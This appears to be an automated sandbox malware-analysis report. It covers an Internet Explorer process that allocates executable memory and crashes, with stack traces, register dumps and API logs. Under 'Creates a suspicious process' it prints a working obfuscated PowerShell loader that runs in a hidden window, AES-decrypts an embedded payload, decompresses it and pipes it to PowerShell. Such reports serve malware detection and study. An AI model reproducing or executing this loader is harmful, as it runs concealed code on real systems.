Ndr64AsyncServerCallAll+0x12ec Ndr64AsyncClientCall-0x6f4 rpcrt4+0xdb76c @ 0x7fefde8b76c
NdrStubCall3+0xc6 NdrOleAllocate-0x3ea rpcrt4+0x348d6 @ 0x7fefdde48d6
CoGetInstanceFromFile+0x4cd3 HACCEL_UserFree-0x70fd ole32+0x170883 @ 0x7fefe130883
CoGetInstanceFromFile+0x511d HACCEL_UserFree-0x6cb3 ole32+0x170ccd @ 0x7fefe130ccd
CoGetInstanceFromFile+0x5093 HACCEL_UserFree-0x6d3d ole32+0x170c43 @ 0x7fefe130c43
CoSetState+0x1450 DcomChannelSetHResult-0x34c ole32+0x2a4f0 @ 0x7fefdfea4f0
GetErrorInfo+0x599 ObjectStublessClient7-0xb1f ole32+0x3d551 @ 0x7fefdffd551
CoGetInstanceFromFile+0x78ce HACCEL_UserFree-0x4502 ole32+0x17347e @ 0x7fefe13347e
CoGetInstanceFromFile+0x567b HACCEL_UserFree-0x6755 ole32+0x17122b @ 0x7fefe13122b
CoGetInstanceFromFile+0x7992 HACCEL_UserFree-0x443e ole32+0x173542 @ 0x7fefe133542
GetErrorInfo+0x475 ObjectStublessClient7-0xc43 ole32+0x3d42d @ 0x7fefdffd42d
GetErrorInfo+0x21e ObjectStublessClient7-0xe9a ole32+0x3d1d6 @ 0x7fefdffd1d6
TranslateMessageEx+0x2a1 IntersectRect-0x11f user32+0x19bd1 @ 0x76ba9bd1
TranslateMessage+0x1ea DispatchMessageW-0x42 user32+0x198da @ 0x76ba98da
GetErrorInfo+0xf3 ObjectStublessClient7-0xfc5 ole32+0x3d0ab @ 0x7fefdffd0ab
CoUnloadingWOW+0x117 OleCreateFromFileEx-0x1829 ole32+0x163e57 @ 0x7fefe123e57
ObjectStublessClient24+0x1876 CLSIDFromString-0x57a ole32+0x10106 @ 0x7fefdfd0106
ObjectStublessClient24+0x18f2 CLSIDFromString-0x4fe ole32+0x10182 @ 0x7fefdfd0182
BaseThreadInitThunk+0xd CreateThread-0x53 kernel32+0x1652d @ 0x7718652d
RtlUserThreadStart+0x21 strchr-0x3df ntdll+0x2c521 @ 0x772bc521

exception.instruction_r: 48 81 c4 c8 00 00 00 c3 48 85 f6 74 08 83 3b 00
exception.symbol: RaiseException+0x3d FreeEnvironmentStringsW-0x373 kernelbase+0xa49d
exception.instruction: add rsp, 0xc8
exception.module: KERNELBASE.dll
exception.exception_code: 0x80040155
exception.offset: 42141
exception.address: 0x7fefda5a49d
registers.r14: 0
registers.r15: 0
registers.rcx: 106947664
registers.rsi: 0
registers.r10: 0
registers.rbx: 0
registers.rsp: 106953616
registers.r11: 106949424
registers.r8: 0
registers.r9: 0
registers.rdx: 1
registers.r12: 0
registers.rbp: 0
registers.rdi: 0
registers.rax: 1902277881
registers.r13: 0

Performs some HTTP requests (1 event)

request

GET http://ie9cvlist.ie.microsoft.com/IE9CompatViewList.xml

Allocates read-write-execute memory (usually to unpack itself) (50 out of 600 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory March 9, 2023, 10:39 a.m.	process_identifier: 3068 region_size: 13570048 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000003090000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory March 9, 2023, 10:39 a.m.	process_identifier: 3068 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000003d80000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory March 9, 2023, 10:39 a.m.	process_identifier: 3068 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076c01000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory March 9, 2023, 10:39 a.m.	process_identifier: 3068 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076c01000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory March 9, 2023, 10:39 a.m.	process_identifier: 3068 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076c01000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory March 9, 2023, 10:39 a.m.	process_identifier: 3068 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076c01000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory March 9, 2023, 10:39 a.m.	process_identifier: 3068 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076c01000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory March 9, 2023, 10:39 a.m.	process_identifier: 3068 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076c01000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory March 9, 2023, 10:39 a.m.	process_identifier: 3068 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076bad000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory March 9, 2023, 10:39 a.m.	process_identifier: 3068 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076bd2000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory March 9, 2023, 10:39 a.m.	process_identifier: 3068 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076bb4000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory March 9, 2023, 10:39 a.m.	process_identifier: 3068 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076bd2000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory March 9, 2023, 10:39 a.m.	process_identifier: 3068 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fefc1d5000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory March 9, 2023, 10:39 a.m.	process_identifier: 3068 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fefc1d5000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory March 9, 2023, 10:39 a.m.	process_identifier: 3068 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fefdc44000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory March 9, 2023, 10:39 a.m.	process_identifier: 3068 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fefdad1000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory March 9, 2023, 10:39 a.m.	process_identifier: 3068 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076b9a000 process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory March 9, 2023, 10:39 a.m.	process_identifier: 3068 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000003550000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory March 9, 2023, 10:39 a.m.	process_identifier: 3068 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fefa1b7000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory March 9, 2023, 10:39 a.m.	process_identifier: 3068 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef69c9000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory March 9, 2023, 10:40 a.m.	process_identifier: 3068 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007feecd69000 process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory March 9, 2023, 10:39 a.m.	process_identifier: 1188 region_size: 11866112 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000002320000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory March 9, 2023, 10:39 a.m.	process_identifier: 1188 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000002e70000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory March 9, 2023, 10:39 a.m.	process_identifier: 1188 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076c01000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory March 9, 2023, 10:39 a.m.	process_identifier: 1188 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076c01000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory March 9, 2023, 10:39 a.m.	process_identifier: 1188 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076c01000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory March 9, 2023, 10:39 a.m.	process_identifier: 1188 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076c01000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory March 9, 2023, 10:39 a.m.	process_identifier: 1188 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076c01000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory March 9, 2023, 10:39 a.m.	process_identifier: 1188 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076c01000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory March 9, 2023, 10:39 a.m.	process_identifier: 1188 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076bad000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory March 9, 2023, 10:39 a.m.	process_identifier: 1188 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076bd2000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory March 9, 2023, 10:39 a.m.	process_identifier: 1188 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076bb4000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory March 9, 2023, 10:39 a.m.	process_identifier: 1188 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076bd2000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory March 9, 2023, 10:39 a.m.	process_identifier: 1188 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fefc1d5000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory March 9, 2023, 10:39 a.m.	process_identifier: 1188 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fefc1d5000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory March 9, 2023, 10:39 a.m.	process_identifier: 1188 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fefdc44000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory March 9, 2023, 10:39 a.m.	process_identifier: 1188 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fefdad1000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory March 9, 2023, 10:39 a.m.	process_identifier: 1188 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076b9a000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory March 9, 2023, 10:39 a.m.	process_identifier: 1188 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076b9f000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory March 9, 2023, 10:39 a.m.	process_identifier: 1188 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076b9d000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory March 9, 2023, 10:39 a.m.	process_identifier: 1188 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076b9b000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory March 9, 2023, 10:39 a.m.	process_identifier: 1188 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000077186000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory March 9, 2023, 10:39 a.m.	process_identifier: 1188 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000772d6000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory March 9, 2023, 10:39 a.m.	process_identifier: 1188 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000077181000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory March 9, 2023, 10:39 a.m.	process_identifier: 1188 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076ba0000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory March 9, 2023, 10:39 a.m.	process_identifier: 1188 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076b9a000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory March 9, 2023, 10:39 a.m.	process_identifier: 1188 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000772af000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory March 9, 2023, 10:39 a.m.	process_identifier: 1188 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000772bb000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory March 9, 2023, 10:39 a.m.	process_identifier: 1188 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fefe117000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory March 9, 2023, 10:39 a.m.	process_identifier: 1188 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fefdbe4000 process_handle: 0xffffffffffffffff	1

An application raised an exception which may be indicative of an exploit crash (2 events)

Time & API	Arguments	Status	Return	Repeated
Application Crash	Process iexplore.exe with pid 3068 crashed
__exception__ March 9, 2023, 10:40 a.m.	stacktrace: RaiseException+0x3d FreeEnvironmentStringsW-0x373 kernelbase+0xa49d @ 0x7fefda5a49d RpcRaiseException+0x53 RpcExceptionFilter-0x2bd rpcrt4+0x173c3 @ 0x7fefddc73c3 ObjectStublessClient32+0x8bf CoDisconnectContext-0x107b9 ole32+0x443bf @ 0x7fefe0043bf IUnknown_AddRef_Proxy+0x1f5 NdrFixedArrayBufferSize-0xeb rpcrt4+0x35295 @ 0x7fefdde5295 I_RpcFreeBuffer+0x1b9 NdrRangeUnmarshall-0x5a7 rpcrt4+0x32799 @ 0x7fefdde2799 Ndr64AsyncServerCallAll+0xa9e Ndr64AsyncClientCall-0xf42 rpcrt4+0xdaf1e @ 0x7fefde8af1e Ndr64AsyncServerCallAll+0x12ec Ndr64AsyncClientCall-0x6f4 rpcrt4+0xdb76c @ 0x7fefde8b76c NdrStubCall3+0xc6 NdrOleAllocate-0x3ea rpcrt4+0x348d6 @ 0x7fefdde48d6 CoGetInstanceFromFile+0x4cd3 HACCEL_UserFree-0x70fd ole32+0x170883 @ 0x7fefe130883 CoGetInstanceFromFile+0x511d HACCEL_UserFree-0x6cb3 ole32+0x170ccd @ 0x7fefe130ccd CoGetInstanceFromFile+0x5093 HACCEL_UserFree-0x6d3d ole32+0x170c43 @ 0x7fefe130c43 CoSetState+0x1450 DcomChannelSetHResult-0x34c ole32+0x2a4f0 @ 0x7fefdfea4f0 GetErrorInfo+0x599 ObjectStublessClient7-0xb1f ole32+0x3d551 @ 0x7fefdffd551 CoGetInstanceFromFile+0x78ce HACCEL_UserFree-0x4502 ole32+0x17347e @ 0x7fefe13347e CoGetInstanceFromFile+0x567b HACCEL_UserFree-0x6755 ole32+0x17122b @ 0x7fefe13122b CoGetInstanceFromFile+0x7992 HACCEL_UserFree-0x443e ole32+0x173542 @ 0x7fefe133542 GetErrorInfo+0x475 ObjectStublessClient7-0xc43 ole32+0x3d42d @ 0x7fefdffd42d GetErrorInfo+0x21e ObjectStublessClient7-0xe9a ole32+0x3d1d6 @ 0x7fefdffd1d6 TranslateMessageEx+0x2a1 IntersectRect-0x11f user32+0x19bd1 @ 0x76ba9bd1 TranslateMessage+0x1ea DispatchMessageW-0x42 user32+0x198da @ 0x76ba98da GetErrorInfo+0xf3 ObjectStublessClient7-0xfc5 ole32+0x3d0ab @ 0x7fefdffd0ab CoUnloadingWOW+0x117 OleCreateFromFileEx-0x1829 ole32+0x163e57 @ 0x7fefe123e57 ObjectStublessClient24+0x1876 CLSIDFromString-0x57a ole32+0x10106 @ 0x7fefdfd0106 ObjectStublessClient24+0x18f2 CLSIDFromString-0x4fe ole32+0x10182 @ 0x7fefdfd0182 BaseThreadInitThunk+0xd CreateThread-0x53 kernel32+0x1652d @ 0x7718652d RtlUserThreadStart+0x21 strchr-0x3df ntdll+0x2c521 @ 0x772bc521 exception.instruction_r: 48 81 c4 c8 00 00 00 c3 48 85 f6 74 08 83 3b 00 exception.symbol: RaiseException+0x3d FreeEnvironmentStringsW-0x373 kernelbase+0xa49d exception.instruction: add rsp, 0xc8 exception.module: KERNELBASE.dll exception.exception_code: 0x80040155 exception.offset: 42141 exception.address: 0x7fefda5a49d registers.r14: 0 registers.r15: 0 registers.rcx: 106947664 registers.rsi: 0 registers.r10: 0 registers.rbx: 0 registers.rsp: 106953616 registers.r11: 106949424 registers.r8: 0 registers.r9: 0 registers.rdx: 1 registers.r12: 0 registers.rbp: 0 registers.rdi: 0 registers.rax: 1902277881 registers.r13: 0	1	0	0

Application Crash

Process iexplore.exe with pid 3068 crashed

Time & API

Arguments

Status

Return

Repeated

__exception__

March 9, 2023, 10:40 a.m.

stacktrace:

RaiseException+0x3d FreeEnvironmentStringsW-0x373 kernelbase+0xa49d @ 0x7fefda5a49d
RpcRaiseException+0x53 RpcExceptionFilter-0x2bd rpcrt4+0x173c3 @ 0x7fefddc73c3
ObjectStublessClient32+0x8bf CoDisconnectContext-0x107b9 ole32+0x443bf @ 0x7fefe0043bf
IUnknown_AddRef_Proxy+0x1f5 NdrFixedArrayBufferSize-0xeb rpcrt4+0x35295 @ 0x7fefdde5295
I_RpcFreeBuffer+0x1b9 NdrRangeUnmarshall-0x5a7 rpcrt4+0x32799 @ 0x7fefdde2799
Ndr64AsyncServerCallAll+0xa9e Ndr64AsyncClientCall-0xf42 rpcrt4+0xdaf1e @ 0x7fefde8af1e
Ndr64AsyncServerCallAll+0x12ec Ndr64AsyncClientCall-0x6f4 rpcrt4+0xdb76c @ 0x7fefde8b76c
NdrStubCall3+0xc6 NdrOleAllocate-0x3ea rpcrt4+0x348d6 @ 0x7fefdde48d6
CoGetInstanceFromFile+0x4cd3 HACCEL_UserFree-0x70fd ole32+0x170883 @ 0x7fefe130883
CoGetInstanceFromFile+0x511d HACCEL_UserFree-0x6cb3 ole32+0x170ccd @ 0x7fefe130ccd
CoGetInstanceFromFile+0x5093 HACCEL_UserFree-0x6d3d ole32+0x170c43 @ 0x7fefe130c43
CoSetState+0x1450 DcomChannelSetHResult-0x34c ole32+0x2a4f0 @ 0x7fefdfea4f0
GetErrorInfo+0x599 ObjectStublessClient7-0xb1f ole32+0x3d551 @ 0x7fefdffd551
CoGetInstanceFromFile+0x78ce HACCEL_UserFree-0x4502 ole32+0x17347e @ 0x7fefe13347e
CoGetInstanceFromFile+0x567b HACCEL_UserFree-0x6755 ole32+0x17122b @ 0x7fefe13122b
CoGetInstanceFromFile+0x7992 HACCEL_UserFree-0x443e ole32+0x173542 @ 0x7fefe133542
GetErrorInfo+0x475 ObjectStublessClient7-0xc43 ole32+0x3d42d @ 0x7fefdffd42d
GetErrorInfo+0x21e ObjectStublessClient7-0xe9a ole32+0x3d1d6 @ 0x7fefdffd1d6
TranslateMessageEx+0x2a1 IntersectRect-0x11f user32+0x19bd1 @ 0x76ba9bd1
TranslateMessage+0x1ea DispatchMessageW-0x42 user32+0x198da @ 0x76ba98da
GetErrorInfo+0xf3 ObjectStublessClient7-0xfc5 ole32+0x3d0ab @ 0x7fefdffd0ab
CoUnloadingWOW+0x117 OleCreateFromFileEx-0x1829 ole32+0x163e57 @ 0x7fefe123e57
ObjectStublessClient24+0x1876 CLSIDFromString-0x57a ole32+0x10106 @ 0x7fefdfd0106
ObjectStublessClient24+0x18f2 CLSIDFromString-0x4fe ole32+0x10182 @ 0x7fefdfd0182
BaseThreadInitThunk+0xd CreateThread-0x53 kernel32+0x1652d @ 0x7718652d
RtlUserThreadStart+0x21 strchr-0x3df ntdll+0x2c521 @ 0x772bc521

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\Desktop\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (6 events)

cmdline	powershell.exe -ExecutionPolicy UnRestricted Start-Process 'cmd.exe' -WindowStyle hidden -ArgumentList {/c powershell.exe $sXWykRBF = 'AAAAAAAAAAAAAAAAAAAAAJpoGWaNf5IdlBmuvwtYV9TVr/VpIoDYevkd9CvadOuHa6CgsxOKFSJyQe5/lXF5b8H9L3qLyr4t4ySRH+9zc9SGvqLkXK50KAkT/W1T9hOe4gq3fVzRNKSn0H7OWSSOr+YXI5c6sEYlAqA/zutoKq4lUdwqwXtqW/yQJpL7pob2jZlCWEBh7dF8Vx41fr/KJJZBzvedXt72yW47z27UrrfjPLvVhw8AiSNBojD3V2wNcSG4dxkq2wXhTcGgAjU57CDSYNY1oPFcxvkkMcd8NlM+Jjv5tSbN65Y6WPkieNrQPmTF1MX7EUtITzzDYmOrV9yVKFfrrW5rThyg1cpRfKM4qJ0GucikSrp6jYKtTcMn8GK1PrTJ6mDmbFEHkBTcwieZhqp/UO8l1He33I9VcIKN466EjIcWdJeyEk/Qgkn+ny9zqy+VO7vdbEMvJYfIzQFx1cJXF0llmvvXVvczx1XRzSWZtqo7aIUXj1n/PYmSH5FjDkm299dbE2/DYXapmV/G89a07mxC7SR6VGh0fOLx8/xj/qh9sT6Ho52ei6fmNZf+y2hP1N7R+++3BcD0zDWMOSnHDiP+BytDWczf1Atmczui2y3Jn7gL2pI9vJ3MT7WV3ZVGJRcAeITqiKnUtIaM/Ojx4tPGVZxhtOD7U1bML/OgUkMGP0s0nPGzOACBJyjbMENvN3sY1c0C8tcrRYp2JXcAJPxvzZrniU53I59hUbnp15mRjm6YMH4whnKIaBYDZpqRVBG0zfpOriy06KPle7wg0GBtz1EJOtHXDc2qOOaa9X/piFXKxXNv4T1zPKdMC9lFDI9S4HCMSsn2PHmRxsHPV1agbpN7uecE39zyW89jwhQOCFpWgEtCTk8Xr/4oTUq8xQSzW4Pd3mCggvEk7ePnzHdvTuAHki9wirFFx/gn2quGL6fmCO6QkVXkKFmMzzCAyl2z5p2tjGk8tM3or4VJ87tr+JsQhg4kjHL/UWFLPodNSMlAyd1yF0ODyMj5V+G0ec2Vhk0eppTY4Q==';$rbYLVE = 'amFBcWZOeWJqeFlsREdJbWROT09kWmFVV2pUaEhYc3o=';$CuIweXh = New-Object 'System.Security.Cryptography.AesManaged';$CuIweXh.Mode = [System.Security.Cryptography.CipherMode]::ECB;$CuIweXh.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$CuIweXh.BlockSize = 128;$CuIweXh.KeySize = 256;$CuIweXh.Key = [System.Convert]::FromBase64String($rbYLVE);$ZzeKD = [System.Convert]::FromBase64String($sXWykRBF);$xXkozePy = $ZzeKD[0..15];$CuIweXh.IV = $xXkozePy;$MJBVchSHX = $CuIweXh.CreateDecryptor();$knMAOfntz = $MJBVchSHX.TransformFinalBlock($ZzeKD, 16, $ZzeKD.Length - 16);$CuIweXh.Dispose();$AmKl = New-Object System.IO.MemoryStream( , $knMAOfntz );$nmHfSWqs = New-Object System.IO.MemoryStream;$qzLQCznWu = New-Object System.IO.Compression.GzipStream $AmKl, ([IO.Compression.CompressionMode]::Decompress);$qzLQCznWu.CopyTo( $nmHfSWqs );$qzLQCznWu.Close();$AmKl.Close();[byte[]] $WjmlMrK = $nmHfSWqs.ToArray();$girxv = [System.Text.Encoding]::UTF8.GetString($WjmlMrK);$girxv \| powershell - }
cmdline	C:\Windows\System32\cmd.exe /c powershell.exe $sXWykRBF = 'AAAAAAAAAAAAAAAAAAAAAJpoGWaNf5IdlBmuvwtYV9TVr/VpIoDYevkd9CvadOuHa6CgsxOKFSJyQe5/lXF5b8H9L3qLyr4t4ySRH+9zc9SGvqLkXK50KAkT/W1T9hOe4gq3fVzRNKSn0H7OWSSOr+YXI5c6sEYlAqA/zutoKq4lUdwqwXtqW/yQJpL7pob2jZlCWEBh7dF8Vx41fr/KJJZBzvedXt72yW47z27UrrfjPLvVhw8AiSNBojD3V2wNcSG4dxkq2wXhTcGgAjU57CDSYNY1oPFcxvkkMcd8NlM+Jjv5tSbN65Y6WPkieNrQPmTF1MX7EUtITzzDYmOrV9yVKFfrrW5rThyg1cpRfKM4qJ0GucikSrp6jYKtTcMn8GK1PrTJ6mDmbFEHkBTcwieZhqp/UO8l1He33I9VcIKN466EjIcWdJeyEk/Qgkn+ny9zqy+VO7vdbEMvJYfIzQFx1cJXF0llmvvXVvczx1XRzSWZtqo7aIUXj1n/PYmSH5FjDkm299dbE2/DYXapmV/G89a07mxC7SR6VGh0fOLx8/xj/qh9sT6Ho52ei6fmNZf+y2hP1N7R+++3BcD0zDWMOSnHDiP+BytDWczf1Atmczui2y3Jn7gL2pI9vJ3MT7WV3ZVGJRcAeITqiKnUtIaM/Ojx4tPGVZxhtOD7U1bML/OgUkMGP0s0nPGzOACBJyjbMENvN3sY1c0C8tcrRYp2JXcAJPxvzZrniU53I59hUbnp15mRjm6YMH4whnKIaBYDZpqRVBG0zfpOriy06KPle7wg0GBtz1EJOtHXDc2qOOaa9X/piFXKxXNv4T1zPKdMC9lFDI9S4HCMSsn2PHmRxsHPV1agbpN7uecE39zyW89jwhQOCFpWgEtCTk8Xr/4oTUq8xQSzW4Pd3mCggvEk7ePnzHdvTuAHki9wirFFx/gn2quGL6fmCO6QkVXkKFmMzzCAyl2z5p2tjGk8tM3or4VJ87tr+JsQhg4kjHL/UWFLPodNSMlAyd1yF0ODyMj5V+G0ec2Vhk0eppTY4Q==';$rbYLVE = 